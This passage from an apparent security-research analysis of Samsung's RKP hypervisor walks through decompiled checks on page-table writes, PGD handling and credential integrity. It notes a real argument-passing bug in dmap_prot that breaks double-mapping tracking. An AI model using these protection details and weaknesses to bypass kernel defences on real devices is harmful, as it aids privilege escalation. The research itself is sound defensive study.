      // Ensure the object VA is aligned on the size of the vfsmount structure.
      object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the vfsmount structure.
          rkp_cred->NS_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

The rkp_cmd_prot_dble_map function is called to inform the hypervisor that one or multiple pages are being mapped or unmapped, with the end goal being to prevent double mapping. This function calls rkp_prot_dble_map, which sets or unsets the bits of dbl_bitmap for each page of the region.

saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
  // ...

  // Sanity-check: the base address must be page-aligned.
  address = regs->x2 & 0xfffffffff000;
  if (!address) {
    return 0;
  }
  // The value to put in the bitmap (0 = unmapped, 1 = mapped).
  val = regs->x4;
  if (val > 1) {
    uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
    return 0;
  }
  // The order, from which the size of the region can be calculated.
  order = regs->x3;
  if (order <= 19) {
    offset = 0;
    size = 0x1000 << order;
    // Iterate over all the pages in the target region.
    do {
      // Set the `dbl_bitmap` value for the current page.
      res = rkp_set_map_bitmap(address + offset, val);
      if (!res) {
        uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
      }
      offset += 0x1000;
    } while (offset < size);
  }
}

The attentive reader will have noticed that the kernel function dmap_prot doesn't call the hypervisor function rkp_prot_dble_map properly: it doesn't pass its addr argument along, so the arguments are all shifted by one and the double-mapping tracking doesn't work as expected.
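
For comparison, here is a hedged sketch of what the call would need to look like to match what rkp_prot_dble_map expects (x2 = address, x3 = order, x4 = map/unmap flag); this is not what the shipped kernel does:

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    /* Hypothetical corrected version, for illustration only: the address is
     * passed first, since the hypervisor reads it from x2. The shipped kernel
     * passes (order, val, 0, 0), so the hypervisor treats `order` as the
     * address and `val` as the order. */
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, addr, order, val, 0);
}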

The last two functions, rkp_cmd_assign_cred_size and rkp_cmd_assign_ns_size, are used by the kernel mainly to tell the hypervisor the size of the structures allocated in the read-only caches.

rkp_cmd_assign_cred_size calls rkp_assign_cred_size, which saves the sizes of the cred and task_security_struct structures into global variables.

int64_t rkp_assign_cred_size(saved_regs_t* regs) {
  // ...

  // Save the size of the cred structure in `CRED_BUFF_SIZE`.
  cred_jar_size = regs->x2;
  rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
  // Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
  tsec_jar_size = regs->x3;
  rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
  return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}

rkp_cmd_assign_ns_size calls rkp_assign_ns_size, which saves the size of the vfsmount structure, and the offsets of various fields of this structure, into the global variable rkp_cred that we will detail later.

int64_t rkp_assign_ns_size(saved_regs_t* regs) {
  // ...

  // The global variable must have been allocated.
  if (!rkp_cred) {
    return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
  }
  // The argument structure VA is converted into a PA.
  nsparam_user = rkp_get_pa(regs->x2);
  if (!nsparam_user) {
    return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
  }
  // It is copied into a local variable before extracting the various fields.
  memcpy(&nsparam, nsparam_user, sizeof(nsparam));
  // Save the size of the vfsmount structure.
  ns_buff_size = nsparam.ns_buff_size;
  ns_size = nsparam.ns_size;
  rkp_cred->NS_BUFF_SIZE = ns_buff_size;
  rkp_cred->NS_SIZE = ns_size;
  // Ensure the offsets of the fields are smaller than the vfsmount structure size.
  if (nsparam.bp_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  sb_offset = nsparam.sb_offset;
  if (nsparam.sb_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  flag_offset = nsparam.flag_offset;
  if (nsparam.flag_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  data_offset = nsparam.data_offset;
  if (nsparam.data_offset > ns_size) {
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  }
  // Save the offsets of the various fields of the vfsmount structure.
  rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
  rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
  rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
  rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
  uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated  Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
  return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
                rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}

Modifying Page Tables

In the Page Tables Processing section, we have seen that most of the kernel page tables are made read-only in the second stage. But what happens if the kernel needs to modify its page table entries? This is what we are going to see in this section.

On the kernel side, the entries are modified for each level in the set_pud, set_pmd, and set_pte functions.

For PUDs and PMDs, set_pud and set_pmd first check if the page is protected by the hypervisor by calling the rkp_is_pg_protected function (that uses the ro_bitmap). If the page is indeed protected, then they call the RKP_WRITE_PGT1 and RKP_WRITE_PGT2 commands, respectively, instead of performing the write directly.

static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pudp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pudp), "r" (pud)
        : "x1", "x2", "memory");
    }
#else
    *pudp = pud;
#endif
    dsb(ishst);
    isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pmdp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pmdp), "r" (pmd)
        : "x1", "x2", "memory");
    }
#else
    *pmdp = pmd;
#endif
    dsb(ishst);
    isb();
}

For PTs, set_pte also checks if the page is protected, but in addition, it calls rkp_is_pg_dbl_mapped to check if the physical page is already mapped somewhere else in virtual memory (using the dbl_bitmap). This way, the kernel can detect double mappings.

static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
    /* bug on double mapping */
    BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));

    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (ptep), "r" (pte)
        : "x1", "x2", "memory");
    }
#else
    *ptep = pte;
#endif
    /*
     * Only if the new pte is valid and kernel, otherwise TLB maintenance
     * or update_mmu_cache() have the necessary barriers.
     */
    if (pte_valid_not_user(pte)) {
        dsb(ishst);
        isb();
    }
}

On the hypervisor side, the rkp_cmd_write_pgt1, rkp_cmd_write_pgt2, and rkp_cmd_write_pgt3 functions simply call rkp_l1pgt_write, rkp_l2pgt_write, and rkp_l3pgt_write, respectively, after incrementing a counter.
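
As a rough sketch (the counter variable is an assumption and its name is made up), each of these handlers presumably looks like the following:

int64_t rkp_cmd_write_pgt1(saved_regs_t* regs) {
  // Hypothetical sketch, for illustration only: bump a per-command counter,
  // then forward the descriptor address (x2) and the new descriptor value (x3).
  rkp_write_pgt1_count++;
  rkp_l1pgt_write(regs->x2, regs->x3);
  return 0;
}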

We will now detail the checks that are performed by the hypervisor when modifying an entry of each page table level.

First Level

rkp_l1pgt_write handles writes to first level tables (or PUDs). It first ensures the PUD is marked as L1 in the physmap; if it is not, the write is performed directly when RKP is not deferred-initialized, and a policy violation is triggered otherwise. It then processes the old descriptor value: blocks are not allowed to be unmapped, and tables are processed by the rkp_l2pgt_process_table function. The new descriptor value is processed as well: blocks are not allowed to be mapped, tables are also processed by rkp_l2pgt_process_table, and the PXN bit of the descriptor is set for user PUDs. Finally, the descriptor value is updated.

uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
  // ...

  // Convert the PUD descriptor VA into a PA.
  pudp_pa = rkp_get_pa(pudp);
  // Get the old/current value of the PUD descriptor.
  pud_old = *pudp_pa;
  rkp_phys_map_lock(pudp_pa);
  // Ensure the PUD is marked as such in the physmap.
  if (!is_phys_map_l1(pudp_pa)) {
    // If it is not, but RKP is not deferred initialized, perform the write.
    if (!rkp_deferred_inited) {
      set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
      return rkp_phys_map_unlock(pudp_pa);
    }
    // Otherwise, trigger a policy violation.
    rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
  }
  // Check if this is a kernel or user PUD using the physmap.
  is_kernel = is_phys_map_kernel(pudp_pa);
  // The old descriptor was valid.
  if (pud_old) {
    // The old descriptor was not a table, thus was a block.
    if ((pud_old & 0b11) != 0b11) {
      // Unmapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
    }
    // The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
    res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
  }
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // The new descriptor is valid.
  if (pud_new) {
    // Get the VA mapped by the PUD descriptor.
    addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
    // The new descriptor is not a table, thus is a block.
    if ((pud_new & 0b11) != 0b11) {
      // Mapping a block is not allowed, trigger a policy violation.
      rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
    }
    // The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
    res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
    // For user PUD, set the PXN bit of the PUD descriptor.
    if (!is_kernel) {
      set_pxn_bit_of_desc(&pud_new, 1);
    }
    // ...
  }
  if (res) {
    uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
    return rkp_phys_map_unlock(pudp_pa);
  }
  // Finally, perform the write of the PUD descriptor on behalf of the kernel.
  set_entry_of_pgt(pudp_pa, pud_new);
  return rkp_phys_map_unlock(pudp_pa);
}

Second Level

rkp_l2pgt_write handles writes to second level tables (or PMDs). It first ensures the PMD is marked as L2 in the physmap. It then processes the old and new descriptor values using the check_single_l2e function. If the old or the new descriptor maps protected memory, the write is disallowed. Finally, if both checks pass, the new descriptor value is written.

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
  // ...

  // Convert the PMD descriptor VA into a PA.
  pmdp_pa = rkp_get_pa(pmdp);
  // Get the old/current value of the PMD descriptor.
  pmd_old = *pmdp_pa;
  rkp_phys_map_lock(pmdp_pa);
  // Ensure the PMD is marked as such in the physmap.
  if (!is_phys_map_l2(pmdp_pa)) {
    // If RKP is deferred initialized, continue with the processing.
    if (rkp_deferred_inited) {
      uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
    }
    // Otherwise, perform the write.
    else {
      set_entry_of_pgt(pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  is_flag3 = is_phys_map_flag3(pmdp_pa);
  // Check if this is a kernel or user PMD using the physmap.
  is_kernel = is_phys_map_kernel(pmdp_pa);
  // Get the start VA corresponding to the kernel or user page tables.
  start_addr = 0xffffff8000000000;
  if (!is_kernel) {
    start_addr = 0;
  }
  // Get the VA mapped by the PMD descriptor.
  addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
  // If the old descriptor was valid.
  if (pmd_old) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
    // If the old descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  // If the new descriptor is valid.
  if (pmd_new) {
    // Call `check_single_l2e` to check the next level.
    res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
    // If the new descriptor maps protected memory, do not perform the write.
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
    // ...
  }
  // Finally, perform the write of the PMD descriptor on behalf of the kernel.
  set_entry_of_pgt(pmdp_pa, pmd_new);
  return rkp_phys_map_unlock(pmdp_pa);
}

Third Level

rkp_l3pgt_write handles writes to third level tables (or PTs). There is a special case if the descriptor maps virtual memory right before the kernel text section, in which case its PXN bit is set and the write is performed. Otherwise, the write is allowed if the PT is marked as L3 or as FREE in the physmap, and either the new descriptor is not a page descriptor, its PXN bit is set, or RKP is not deferred initialized.

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...

  // Convert the PT descriptor VA into a PA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  cs_enter(&l3pgt_lock);
  // In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
  // text section and maps memory that is before the start of the kernel text section.
  if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
    // Set the PXN bit of the new descriptor value.
    if (pte_val) {
      pte_val |= (1 << 53);
    }
    cs_exit(&l3pgt_lock);
    // And perform the write on behalf of the kernel.
    return set_entry_of_pgt(ptep_pa, pte_val);
  }
  cs_exit(&l3pgt_lock);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}

Allocating and Freeing PGDs

In addition to modifying the descriptors contained in the PUDs, PMDs, and PTs, the kernel also needs to allocate, and sometimes free, PGDs.

On the kernel side, the allocation of a PGD is done by the pgd_alloc function. It calls rkp_ro_alloc to get a read-only page from the hypervisor and then invokes the RKP_NEW_PGD command to notify RKP that this page will be a PGD.

pgd_t *pgd_alloc(struct mm_struct *mm)
{
    // ...
    pgd_t *ret = NULL;

    ret = (pgd_t *) rkp_ro_alloc();

    if (!ret) {
        if (PGD_SIZE == PAGE_SIZE)
            ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
        else
            ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
    }

    if(unlikely(!ret)) {
        pr_warn("%s: pgd alloc is failed\n", __func__);
        return ret;
    }

    uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);

    return ret;
    // ...
}

The freeing of a PGD is done by the pgd_free function. It invokes the RKP_FREE_PGD command to notify RKP that this page will no longer be a PGD and then calls rkp_ro_free to relinquish the page to the hypervisor.

void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
    // ...
    uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);

    /* if pgd memory come from read only buffer, the put it back */
    /*TODO: use a macro*/
    if (is_rkp_ro_page((u64)pgd))
        rkp_ro_free((void *)pgd);
    else {
        if (PGD_SIZE == PAGE_SIZE)
            free_page((unsigned long)pgd);
        else
            kmem_cache_free(pgd_cache, pgd);
    }
    // ...
}

On the hypervisor side, the rkp_cmd_new_pgd function ends up calling rkp_l1pgt_new_pgd after incrementing a counter. This function triggers a policy violation if the new PGD is swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it calls rkp_l1pgt_process_table to process the new PGD (which is assumed to be a user PGD).

void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
  // The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
    rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
  }
  // If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

The rkp_cmd_free_pgd function ends up calling rkp_l1pgt_free_pgd after incrementing a counter. This function triggers a policy violation if the freed PGD is swapper_pg_dir, idmap_pg_dir, or tramp_pg_dir. If RKP is initialized, it first logs an error if the PGD is the currently active user or kernel PGD (checked against the TTBR0_EL1 and TTBR1_EL1 system registers), then calls rkp_l1pgt_process_table to process the old PGD.

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
  // ...

  // Convert the PGD VA into a PA.
  pgd_pa = rkp_get_pa(regs->x2);
  pgdp = pgd_pa & 0xfffffffffffff000;
  // The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
           ID_MAP_PGD);
    rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
  }
  // If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
  else if (rkp_inited) {
    // Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
    if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
        (get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
      uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
             get_ttbr0_el1(), get_ttbr1_el1());
    }
    if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
      uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
    }
  }
}

Credentials Protection

Kernel Structures

In the Protecting Kernel Data section, we have seen that the cred and task_security_struct structures are now allocated on read-only pages provided by the hypervisor. Thus, they can no longer be modified directly by the kernel. In addition, new fields are added to these structures for Data Flow Integrity (DFI) purposes. In particular, each structure now gets a "back-pointer", i.e. a pointer to the owning structure:

  • the task_struct for the cred structure;
  • the cred for the task_security_struct structure.

The cred structure also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the cred structure of another task_struct (in particular, one might try to reuse the init task credentials).

struct cred {
    // ...
    atomic_t *use_cnt;
    struct task_struct *bp_task;
    void *bp_pgd;
    unsigned long long type;
} __randomize_layout;
struct task_security_struct {
    // ...
    void *bp_cred;
};

These back-pointers and values are verified when a SELinux hook is executed via a call to security_integrity_current. On our research device, the call to this function is missing, so in this section we will take a look at the source code of a different Samsung device that has it.

The kernel macros call_void_hook and call_int_hook contain the calls to security_integrity_current.

#define call_void_hook(FUNC, ...)               \
    do {                            \
        struct security_hook_list *P;           \
                                \
        if(security_integrity_current()) break; \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) \
            P->hook.FUNC(__VA_ARGS__);      \
    } while (0)

#define call_int_hook(FUNC, IRC, ...) ({            \
    int RC = IRC;                       \
    do {                            \
        struct security_hook_list *P;           \
                                \
        RC = security_integrity_current();      \
        if (RC != 0)                            \
            break;                              \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
            RC = P->hook.FUNC(__VA_ARGS__);     \
            if (RC != 0)                \
                break;              \
        }                       \
    } while (0);                        \
    RC;                         \
})

security_integrity_current first calls rkp_is_valid_cred_sp to verify that the credentials and security structures are allocated from a hypervisor-protected page. It then calls cmp_sec_integrity to verify the credentials' integrity, and cmp_ns_integrity to verify the mount namespace's integrity.

int security_integrity_current(void)
{
    rcu_read_lock();
    if ( rkp_cred_enable && 
        (rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
        cmp_sec_integrity(current_cred(),current->mm)||
        cmp_ns_integrity())) {
        rkp_print_debug();
        rcu_read_unlock();
        panic("RKP CRED PROTECTION VIOLATION\n");
    }
    rcu_read_unlock();
    return 0;
}

rkp_is_valid_cred_sp ensures that the credentials and security structures are protected by the hypervisor. init_cred and init_sec form a valid pair. For other pairs, the start and end of the structures must be located in a read-only page that has been allocated by the hypervisor. In addition, the back-pointer of the task_security_struct must be the correct cred structure.

extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
        struct task_security_struct *tsec = (struct task_security_struct *)sp;

        if((cred == (u64)&init_cred) && 
            ( sp == (u64)&init_sec)){
            return 0;
        }
        if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
            (!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
            return 1;
        }
        if((u64)tsec->bp_cred != cred) {
            return 1;
        }
        return 0;
}

cmp_sec_integrity checks that the back-pointer of the cred is the current task_struct, and that the PGD back-pointer of the cred is either swapper_pg_dir or the same as the PGD of the current memory descriptor.

static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
    return ((cred->bp_task != current) || 
            (mm && (!( in_interrupt() || in_softirq())) && 
            (cred->bp_pgd != swapper_pg_dir) &&
            (mm->pgd != cred->bp_pgd)));    
}

Protection Initialization

In order to be able to modify the cred structure of processes on behalf of the kernel and to perform verifications on the values of its fields, the hypervisor needs to be aware of its layout and of the layout of the task_struct structure.

On the kernel side, the function that does that is kdp_init. It invokes the RKP_KDP_X40 command with the offsets needed by RKP and, in addition, the virtual addresses of the verifiedbootstate and ss_initialized global variables.

void kdp_init(void)
{
    kdp_init_t cred;

    cred.credSize   = sizeof(struct cred);
    cred.sp_size    = rkp_get_task_sec_size();
    cred.pgd_mm     = offsetof(struct mm_struct,pgd);
    cred.uid_cred   = offsetof(struct cred,uid);
    cred.euid_cred  = offsetof(struct cred,euid);
    cred.gid_cred   = offsetof(struct cred,gid);
    cred.egid_cred  = offsetof(struct cred,egid);

    cred.bp_pgd_cred    = offsetof(struct cred,bp_pgd);
    cred.bp_task_cred   = offsetof(struct cred,bp_task);
    cred.type_cred      = offsetof(struct cred,type);
    cred.security_cred  = offsetof(struct cred,security);
    cred.usage_cred     = offsetof(struct cred,use_cnt);

    cred.cred_task      = offsetof(struct task_struct,cred);
    cred.mm_task        = offsetof(struct task_struct,mm);
    cred.pid_task       = offsetof(struct task_struct,pid);
    cred.rp_task        = offsetof(struct task_struct,real_parent);
    cred.comm_task      = offsetof(struct task_struct,comm);

    cred.bp_cred_secptr     = rkp_get_offset_bp_cred();

    cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
    cred.selinux.ss_initialized_va  = (u64)&ss_initialized;
#endif
    uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}

The first function called by kdp_init, rkp_get_task_sec_size, simply returns the size of the task_security_struct structure.

unsigned int rkp_get_task_sec_size(void)
{
    return sizeof(struct task_security_struct);
}

And the second function, rkp_get_offset_bp_cred, returns the offset of its bp_cred (back-pointer to credentials) field.

unsigned int rkp_get_offset_bp_cred(void)
{
    return offsetof(struct task_security_struct,bp_cred);
}

The kdp_init function is called from the start_kernel function.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    kdp_init();
    // ...
}

On the hypervisor side, the command is handled by rkp_cmd_cred_init, which calls rkp_cred_init.

rkp_cred_init allocates the rkp_cred structure, extracts and sanity-checks the various offsets provided by the kernel, and stores them into this structure. It also stores if the device is unlocked and the physical address of the variable denoting whether SELinux is initialized.

void rkp_cred_init(saved_regs_t* regs) {
  // ...

  // Allocate the `rkp_cred` structure that will hold all the offsets.
  rkp_cred = malloc(0xf0, 0);
  // Convert the VA of the kernel argument structure to a PA.
  cred = rkp_get_pa(regs->x2);
  // Ensure we're not calling this function multiple times.
  if (cred_inited == 1) {
    uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
    return;
  }
  // Extract the various fields of the kernel-provided structure.
  cred_inited = 1;
  credSize = cred->credSize;
  sp_size = cred->sp_size;
  uid_cred = cred->uid_cred;
  euid_cred = cred->euid_cred;
  gid_cred = cred->gid_cred;
  egid_cred = cred->egid_cred;
  usage_cred = cred->usage_cred;
  bp_pgd_cred = cred->bp_pgd_cred;
  bp_task_cred = cred->bp_task_cred;
  type_cred = cred->type_cred;
  security_cred = cred->security_cred;
  bp_cred_secptr = cred->bp_cred_secptr;
  // Ensure the offsets within a structure are not bigger than the structure total size.
  if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
      usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
      security_cred > credSize || bp_cred_secptr > sp_size) {
    uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
    return;
  }
  // Store the various fields into the corresponding global variables.
  rkp_cred->CRED_SIZE = cred->credSize;
  rkp_cred->SP_SIZE = sp_size;
  rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
  rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
  rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
  rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
  rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
  rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
  rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
  rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
  rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
  rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
  rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
  rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
  rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
  rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
  rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
  rkp_cred->CRED_USE_CNT = usage_cred >> 3;
  rkp_cred->VERIFIED_BOOT_STATE = 0;
  // Convert the VB state VA to a PA, and store the device unlock state in a global variable.
  vbs_va = cred->verifiedbootstate;
  if (vbs_va) {
    vbs_pa = check_and_convert_kernel_input(vbs_va);
    if (vbs_pa != 0) {
      rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
    }
  }
  rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
  // For `ss_initialized`, convert the VA to a PA and store it into a global variable.
  rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
  uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}

PGD Change

When the kernel needs to set the PGD of a task_struct, it calls into the hypervisor, which updates the bp_pgd back-pointer of the task's cred structure.

On the kernel side, the change of a task PGD can happen in two places. The first one is exec_mmap, which invokes the RKP_KDP_X43 command.

static int exec_mmap(struct mm_struct *mm)
{
    // ...
    if(rkp_cred_enable){
    uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
    }
    // ...
}

The second one is the rkp_assign_pgd function, which invokes the same command.

void rkp_assign_pgd(struct task_struct *p)
{
    u64 pgd;
    pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);

    uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}

rkp_assign_pgd is called from copy_process, which is when a process is being copied.

